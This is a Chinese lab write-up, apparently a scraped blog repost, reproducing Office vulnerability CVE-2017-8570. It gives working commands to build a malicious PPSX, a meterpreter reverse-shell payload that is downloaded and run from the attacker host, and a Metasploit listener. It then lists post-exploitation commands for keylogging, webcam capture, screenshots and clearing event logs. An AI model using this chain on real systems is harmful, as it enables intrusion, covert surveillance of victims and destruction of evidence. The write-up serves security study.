CVE-2017-8570漏洞利用
CVE-2017-8570漏洞是一个逻辑漏洞,利用方法简单,影响范围广。由于该漏洞和三年前的SandWorm(沙虫)漏洞非常类似,因此我们称之为“沙虫”二代漏洞。
编号
CVE-2017-8570
影响版本
Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 (32-bit editions) Microsoft Office 2010 Service Pack 2 (64-bit editions) Microsoft Office 2013 RT Service Pack 1 Microsoft Office 2013 Service Pack 1 (32-bit editions) Microsoft Office 2013 Service Pack 1 (64-bit editions) Microsoft Office 2016 (32-bit edition) Microsoft Office 2016 (64-bit edition)
危害
2017年7月,微软在例行的月度补丁中修复了多个Microsoft Office漏洞,其中的CVE-2017-8570
漏洞为一个逻辑漏洞,利用方法简单
。网上已经出现该漏洞的利用代码,影响范围较广。
该漏洞为Microsoft Office的一个远程代码执行漏洞。其成因是Microsoft PowerPoint
执行时会初始化Script”Moniker
对象,而在PowerPoint
播放动画期间会激活
该对象,从而执行sct
脚本(Windows Script Component)文件。攻击者可以欺骗用户运行含有该漏洞的PPT文件,导致获取和当前登录用户相同的代码执行权限。
复现漏洞
这个漏洞并没有进行搭建环境,是因为有更好的选择,发现ichunqiu里面有靶机,可以进行练习。靶机链接(https://www.ichunqiu.com/vm/58919/1)
实验环境
操作机:
windows7 x64
IP:
172.16.11.2
目标机:
Kali Linux
IP:
172.16.12.2
实验步骤
步骤1:生成恶意的PPSX文件
我们首先使用Xshell
连接Kali机器,点击桌面Xshell
图标,输入IP:172.16.12.2
,账号为:root
密码:123456
,如图:
首先我们在Kali中执行如下命令:
cd CVE-2017-8570 //进入exploit的目录python cve-2017-8570_toolkit.py -M gen -w orange.ppsx -u http://172.16.12.2/logo.doc //生成ppsx恶意文件
接下来将我们生成恶意PPSX
文件通过调用Powershell下载并执行。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=4444 -f exe > /tmp/shell.exe
其中 -p
参数是 payload的意思,是使用windows的meterpreter的反弹文件-f
参数 指定输出文件后缀为exe文件再用>
重定向输出到tmp目录下
接下来输入如下命令:
python cve-2017-8570_toolkit.py -M exp -e http://172.16.12.2/shell.exe -l /tmp/shell.exe
这段命令是通过脚本在80端口监听,等待接收ppsx请求并下载执行我们的反弹文件
接下来进入Metasploit,新建一个Kali`172.16.12.2的连接,设置相关参数,接受返回的Shell
msfconsole use multi/handler //使用监听模块 set payload windows/meterpreter/reverse_tcp //设置Payload set LHOST 172.16.12.2 //设置本地接收IP run
可以看到我们的Metaspliot
已经在本地开启监听
到此我们的所有准备都做好,下一步我们模拟用户点击恶意文件
步骤2:目标机器执行恶意PPSX文件
我们使用桌面Xftp
软件,连接上目标机172.16.12.2
,将Invoice.ppsx文件拖到当前桌面上。
如图,他是一个PPT文件,我们模拟用户双击打开它。
执行过程中可以看到代码通过调用powershell
在远程下载执行我们的恶意文件,此时已经反弹回了shell
使用命令:
getuid //获取当前用户ID
这样就获取了目标机器的权限,可以通过Metasploit去执行命令。
至此这个漏洞复现完毕。
后续渗透
截图
meterpreter > screenshot Screenshot saved to: /home/ctf/ccoDxgvg.jpeg
键盘记录
meterpreter > keyscan_start # 开启键盘记录 Starting the keystroke sniffer...meterpreter > keyscan_dump #查看键盘记录内容 Dumping captured keystrokes...** -[ C:\soft\SogouExplorer\SogouExplorer.exe -[ @ 2017年8月13日 4:07:31 UTC ** <Shift>xiaojiejie <Shift>chain<^H><^H><^H>inajoy<CR>meterpreter > keyscan_stop #关闭键盘记录
请除日志
`meterpreter > clearev``
关机
meterpreter > shutdown
截屏
meterpreter >screenshot
摄像头列表
meterpreter > webcam_list
打开摄像头
meterpreter > webcam_snap
禁止目标使用鼠标
meterpreter > uictl disable mouse
启用目标使用键盘
meterpreter > uictl enable keyboard
上传文件
meterpreter > upload /home/ctf/Desktop/快别看小姐姐了你被黑啦.txt C:\\users\\gg\\Desktop
把我们的友情提示上传到win7系统主人的 电脑桌面上
ctf@guoguang:~/Desktop$ cat 快别看小姐姐了你被黑啦.txt 整天不是逛B站 就是 逛A站 除了看小姐姐 还是看小姐姐!~~ (严肃脸)我只想对你说 4个字: 请带上我 meterpreter > upload /home/ctf/Desktop/快别看小姐姐了你被黑啦.txt C:\\users\\gg\\Desktop [*] uploading : home/ctf/Desktop/快别看小姐姐了你被黑啦.txt -> C:\users\gg\Desktop [*] uploaded : home/ctf/Desktop/快别看小姐姐了你被黑啦.txt -> C:\users\gg\Desktop\快别看小姐姐了你被黑啦.txt
shell
meterpreter > shell
shell
顾名思义就是shell
了,这个命令相当于完全控制了windows的cmd命令行,可以执行任意cmd操作,当然只要权限足够大的话。
任重而道远!
转载于:https://www.cnblogs.com/Oran9e/p/8067528.html
CVE-2017-8570漏洞利用相关推荐
- (23)【漏洞利用】【原理、利用过程】中间件解析漏洞、CMS漏洞、编辑器漏洞、CVE漏洞
目录 解析漏洞: 原理: 变化因素: 熟知的中间件(解析漏洞) 0x01 IIS5.x-6.x解析漏洞: (1)目录解析漏洞(IIS6.0) 原理: 利用过程: (2)文件解析漏洞 原理: 利用 ...
- [译] APT分析报告:08.漏洞利用图谱–通过查找作者的指纹来寻找漏洞
这是作者新开的一个专栏,主要翻译国外知名安全厂商的APT报告,了解它们的安全技术,学习它们溯源APT组织和恶意代码分析的方法,希望对您有所帮助.当然,由于作者英语有限,会借助机翻进行校验,还请包涵!前 ...
- [系统安全] 八.Windows漏洞利用之CVE-2019-0708复现及防御详解
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- Botnet趋势漏洞利用状况分析
执行摘要 在过去的一年中,世界遭受了新冠疫情的袭击,生产生活受到了极大的影响.但在网络世界中,僵 尸网络作为多年来的主要威胁形式之一,并未受到疫情的影响,反而更加活.今年,绿盟科技和国家 互联网 应急 ...
- 【每日新闻】2017年漏洞披露数量创纪录达20,832个 | 朱啸虎评ICO:考验人性的模式从来就没有成功过
每一个企业级的人 都置顶了 中国软件网 中国软件网 为你带来最新鲜的行业干货 小编点评 每一个持续进行的模式 都有各自的道理 包括风险投资 趋势洞察 朱啸虎评ICO:考验人性的模式从来就没有成功过 ...
- 蓝牙App系列漏洞原理分析与漏洞利用
蓝牙App系列漏洞原理分析与漏洞利用 作者: heeeeen 本文系转载,目的是学习,如有侵权,请联系删除 转载出处:http://www.ms509.com/ 蓝牙App漏洞系列分析之一CVE-20 ...
- metasploit 快速入门(三) 服务端漏洞利用
目录 简介 01 攻击Linux服务器 02 SQL 注入 03 shell类型 04 攻击Windows 服务器 05 利用公用服务 06 MS17-010 永恒之蓝 SMB远程代码执行Window ...
- CVE-2021-40444 0 day漏洞利用
9月7日,微软发布安全公告称发现Windows IE MSHTML中的一个远程代码执行漏洞,CVE编号为CVE-2021-40444.由于未发布漏洞补丁,微软只称该漏洞可以利用恶意ActiveX控制来 ...
- [系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)
Struts2漏洞利用工具下载(已更新V1.8版) 2017-03-21: 增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过 ...
最新文章
- mysql语句生成工具_强烈推荐一款MySQL语句优化辅助工具,值得收藏
- php用户鉴权,app开发之鉴权 PHP版
- c语言教程项目一实验报告,C语言实验报告(四)
- paip.提高开发效率----自动数据库SQL备份
- JS正则表达式详解[转]
- 为什么chrome视频时卡得厉害(by quqi99)
- 04 Workbench几何模型的创建
- 单号自动识别查询 支持一键复制导出
- R语言ggplot2可视化格式化轴标签:用逗号格式化ggplot2轴标签、在轴标签数值中加入符号标签(货币符号)
- javafx label设置字体大小_JavaFX-实现文本
- Arcgis ToolBOx学习之五——Analysis——Proximity工具
- Java实现3DES加密解密(DESede/ECB/PKCS5Padding使用)
- 国外问卷调查详细讲解
- 小米电视盒子怎样看电视直播?图文教程手把手装应用
- 石膏板GCC认证床垫GCC认证亚马逊美国
- 搜索引擎优化是什么,搜索引擎优化应该怎么学?
- 2020-07-06
- HTML+CSS项目实践九——设置网站导航栏悬浮在网页最上面
- 网易云信联手配音秀,打造语音聊天室互动新体验
- android 渠道号怎么写,android无渠道号推广的细分统计
热门文章
- 小牛电动Q1营收5.5亿:净利润不及预期,3个月内市值缩近五成
- python质因子分解_质因子分解_个人文章 - SegmentFault 思否
- 美军回应网传UFO:视频为真 现有人类技术无法达到
- 快手如何运营才能快速涨粉?
- 如何将html转换成url,HTML之Data URL(转)
- Linux/Ubuntu18.04安装RTL8811cu驱动
- Dtop环球嘉年华全球Web3.0分布式私域电商生态发展峰会圆满举办
- Rais 实现单点登录SSO
- SpringCloud学习一
- Android中GPUImage的简单使用